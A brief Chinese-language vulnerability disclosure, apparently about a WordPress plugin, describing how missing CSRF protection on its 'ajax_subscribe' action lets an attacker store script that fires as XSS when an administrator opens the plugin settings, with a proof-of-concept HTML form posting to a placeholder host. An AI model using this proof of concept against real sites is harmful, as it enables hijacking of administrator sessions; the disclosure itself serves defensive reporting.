由于缺少CSRF的检测,导致任何用户可以修改插件配置,把危险代码存储进数据库,从而导致进一步的XSS攻击
POC如下:
< html>
< body>
< form action="http://exsample.com/wp-admin/admin-ajax.php?action=ajax_subscribe" method="POST" enctype="multipart/form-data">
< input type="hidden" name="email" value="[email protected]“>
< input type="submit" name="Submit">
< /form>
< /body>
< /html>
一旦管理员访问了后台该插件配置,立刻触发了XSS攻击代码